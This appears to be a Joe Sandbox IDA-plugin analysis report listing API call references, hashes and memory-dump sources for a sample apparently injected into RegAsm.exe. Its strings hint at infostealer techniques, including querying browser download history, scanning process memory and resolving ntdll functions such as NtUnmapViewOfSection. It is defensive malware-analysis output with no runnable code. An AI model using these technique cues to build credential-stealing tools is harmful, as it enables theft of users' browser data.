                                                                                                                                                                                                                                                                                                  • Instruction ID: 56c7425758be6e3bb99524be21cfc8d06f86a068529a75faa899e35b8d6b0194
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1322e0bfc0ece0e981ff8d6d8efaddbd8ceb0bc611d6478e6d54d85e031a034c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1331B4333042149BD730AE5CE880A5AF799EBA1764B24063FF151DB7C1D7759C4983AA
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C82F480
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7FF100: LoadLibraryW.KERNEL32(shell32,?,6C86D020), ref: 6C7FF122
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7FF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C7FF132
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 6C82F555
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C8014B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C801248,6C801248,?), ref: 6C8014C9
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C8014B0: memcpy.VCRUNTIME140(?,6C801248,00000000,?,6C801248,?), ref: 6C8014EF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7FEEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C7FEEE3
                                                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32 ref: 6C82F4FD
                                                                                                                                                                                                                                                                                                  • GetFileInformationByHandle.KERNEL32(00000000), ref: 6C82F523
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
                                                                                                                                                                                                                                                                                                  • String ID: \oleacc.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 2595878907-3839883404
                                                                                                                                                                                                                                                                                                  • Opcode ID: 2681d241c04afef4dc79391f5c304fb944ad57770b5efa4de52e86d5a2271b2a
                                                                                                                                                                                                                                                                                                  • Instruction ID: 240e8fd86b2df5a24f7c646c76edce8b12a1afc3ba5e5baf4678cfc5731de2f4
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2681d241c04afef4dc79391f5c304fb944ad57770b5efa4de52e86d5a2271b2a
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 834194706087209FD731DF69CA88A9BB7F4AF54318F100E28F59187650EB34D589CBE2
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 6C857526
                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C857566
                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C857597
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Init_thread_footer$ErrorLast
                                                                                                                                                                                                                                                                                                  • String ID: UnmapViewOfFile2$kernel32.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 3217676052-1401603581
                                                                                                                                                                                                                                                                                                  • Opcode ID: bbdadff84050618fc755b2b011a2f984f422787253c42f63775b04dcdac31621
                                                                                                                                                                                                                                                                                                  • Instruction ID: 00aaa1cbb94b7e2b5f346c432d2e62dc947329f94610250e86c595df2f827d4a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bbdadff84050618fc755b2b011a2f984f422787253c42f63775b04dcdac31621
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 99210B31701590ABCB358BAA8A19E9E33B5EB47368B50CD39D40587F40E764A851C6F1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(ntdll.dll,?,6C85C0E9), ref: 6C85C418
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C85C437
                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,6C85C0E9), ref: 6C85C44C
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                                  • String ID: NtQueryVirtualMemory$ntdll.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 145871493-2623246514
                                                                                                                                                                                                                                                                                                  • Opcode ID: c676a176ed21b1de28c457654bb47c058b226bfe40afd5bf98d34b4ccb2b149f
                                                                                                                                                                                                                                                                                                  • Instruction ID: 1254a80bcfa3088251a6d12a8b92f72d3fbc6391bfc38d5a1a497fb525291b1a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c676a176ed21b1de28c457654bb47c058b226bfe40afd5bf98d34b4ccb2b149f
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FFE09A716053319BDB326BB28A0CB1A7BF9A75B21DF084535EA1592701FBB0D010CBB1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(ntdll.dll,?,6C85748B,?), ref: 6C8575B8
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6C8575D7
                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,6C85748B,?), ref: 6C8575EC
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                                  • String ID: RtlNtStatusToDosError$ntdll.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 145871493-3641475894
                                                                                                                                                                                                                                                                                                  • Opcode ID: 8e53a052b63ad105b7041e3daa60ad3d350b9619d3646f0421c269a6e86e0e69
                                                                                                                                                                                                                                                                                                  • Instruction ID: eb21b092155d9db6cc59543da46ebcd9d531c45f6bce389bf1ee7b6cacb80270
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e53a052b63ad105b7041e3daa60ad3d350b9619d3646f0421c269a6e86e0e69
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 19E0E5B22003A1ABDB325BA2894C7193AF8EB5329CF00C435E90882700FBB89041CFB0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(ntdll.dll,?,6C857592), ref: 6C857608
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 6C857627
                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,6C857592), ref: 6C85763C
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                                  • String ID: NtUnmapViewOfSection$ntdll.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 145871493-1050664331
                                                                                                                                                                                                                                                                                                  • Opcode ID: 4c3eff5ddce68d517e471601c950615142420a33dab4f938d1a8dae00dbd0311
                                                                                                                                                                                                                                                                                                  • Instruction ID: fcfde998e7c914cb7beee185854fb20f97b860e9ff01b326ace9607e071e3928
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c3eff5ddce68d517e471601c950615142420a33dab4f938d1a8dae00dbd0311
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8DE01A752103A09BDF325BA6894C71D3AF9E72729DF008435E908C2740F7B89440CFB4
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 00408628
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 0040863C
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$lstrlen$lstrcat
                                                                                                                                                                                                                                                                                                  • String ID: Downloads$Downloads$SELECT target_path, tab_url from downloads
                                                                                                                                                                                                                                                                                                  • API String ID: 2500673778-2241552939
                                                                                                                                                                                                                                                                                                  • Opcode ID: 3fec0125c66a970581299f07881c9bc933c2ef135ce78adbcda2adbdf9e4d0c0
                                                                                                                                                                                                                                                                                                  • Instruction ID: 916fa3167f108e3fc0815a10e9a8fa09d5f34994d21b7567e67980bf6122bbf9
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3fec0125c66a970581299f07881c9bc933c2ef135ce78adbcda2adbdf9e4d0c0
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 55C16D71801248EACB14EBA4C951BDDBBB9AF19304F54417EE506732D2DF786B0CC769
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 0040F1F5
                                                                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT ref: 0040F222
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040F010: strlen.MSVCRT ref: 0040F01D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040F010: strlen.MSVCRT ref: 0040F037
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040F010: strlen.MSVCRT ref: 0040F0F2
                                                                                                                                                                                                                                                                                                  • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C,?,00000000,00000000,00000000,?,0040FBF1,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000,000000FF,00000FFF), ref: 0040F26E
                                                                                                                                                                                                                                                                                                  • VirtualQueryEx.KERNEL32(?,?,?,0000001C,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040F354
                                                                                                                                                                                                                                                                                                  • ??_V@YAXPAX@Z.MSVCRT ref: 0040F363
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: strlen$QueryVirtual
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3099930812-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 9cac7cf8adf9544d05115e9e868d43c84a38078b29bb2c41b7291d1ad22a2e37
                                                                                                                                                                                                                                                                                                  • Instruction ID: 08fd6b7cdb5f1f35f0b1a3597776a61fadc93441d47195856eb7d8ee17ae8048
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9cac7cf8adf9544d05115e9e868d43c84a38078b29bb2c41b7291d1ad22a2e37
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C51C375A00118ABEB24DEA9DD41ABFB7FAEB88714F14413AFD05E7380D638DD0187A5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(?,00000000,?,?,6C85BE49), ref: 6C85BEC4
                                                                                                                                                                                                                                                                                                  • RtlCaptureStackBackTrace.NTDLL ref: 6C85BEDE
                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,-00000008,?,6C85BE49), ref: 6C85BF38
                                                                                                                                                                                                                                                                                                  • RtlReAllocateHeap.NTDLL ref: 6C85BF83
                                                                                                                                                                                                                                                                                                  • RtlFreeHeap.NTDLL(6C85BE49,00000000), ref: 6C85BFA6
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heapmemset$AllocateBackCaptureFreeStackTrace
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2764315370-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 51b3d8320ced303f912b48333a964a28e5cdd086e0a84b89a4c01a5d4297f72a
                                                                                                                                                                                                                                                                                                  • Instruction ID: 77316657f53e0569b257f567563bc256a53ebd91ef8c2556d29dacb4b8466f23
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 51b3d8320ced303f912b48333a964a28e5cdd086e0a84b89a4c01a5d4297f72a
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B51DF71B002058FE760CF69CE80BAAB3A2FF98314F684A39D505A7B54D771F9168F80
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,6C83B58D,?,?,?,?,?,?,?,6C86D734,?,?,?,6C86D734), ref: 6C848E6E
                                                                                                                                                                                                                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C83B58D,?,?,?,?,?,?,?,6C86D734,?,?,?,6C86D734), ref: 6C848EBF
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?,?,6C83B58D,?,?,?,?,?,?,?,6C86D734,?,?,?), ref: 6C848F24
                                                                                                                                                                                                                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C83B58D,?,?,?,?,?,?,?,6C86D734,?,?,?,6C86D734), ref: 6C848F46
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?,?,6C83B58D,?,?,?,?,?,?,?,6C86D734,?,?,?), ref: 6C848F7A
                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C83B58D,?,?,?,?,?,?,?,6C86D734,?,?,?), ref: 6C848F8F
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: freemalloc
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3061335427-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 779b6c9f3eb84500b50043a77bfaf82d3a491f50b8dbf69e2543abdfa574a724
                                                                                                                                                                                                                                                                                                  • Instruction ID: cf1b3202fc97bb5cfe051175d90db96c1ce300825a2d17c46fb2ffa0f3a7cca7
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 779b6c9f3eb84500b50043a77bfaf82d3a491f50b8dbf69e2543abdfa574a724
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 595192B1A0121A8FEB24CF58D98076E77B2BF45318F15492AD916EB740E731F905CBE1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C7F4E5A
                                                                                                                                                                                                                                                                                                  • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C7F4E97
                                                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7F4EE9
                                                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C7F4F02
                                                                                                                                                                                                                                                                                                  • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6C7F4F1E
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 713647276-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: d0bfb08bf6c34bbf4ae84ff0016d9704aba461587adc1fc941f129aff5391b28
                                                                                                                                                                                                                                                                                                  • Instruction ID: 56a68ce02e11a6a51cc70ef77113c2814670c9c6521af79768b8977abed585e1
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d0bfb08bf6c34bbf4ae84ff0016d9704aba461587adc1fc941f129aff5391b28
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1B41EF716087019FD701CF29CAC095BB7E8BF89344F148A2DF46A97B41DB30E95ADB92
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • memcmp.MSVCRT ref: 0040714B
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00407179
                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 004071B0
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FEB0: lstrlen.KERNEL32(00418579,?,00000000,?,00417CAD,00427387,00427386,00000000,?,00000000,00422CB8,000000FF,?,00418579), ref: 0040FEBB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FEB0: lstrcpy.KERNEL32(00000000,00418579), ref: 0040FEF2
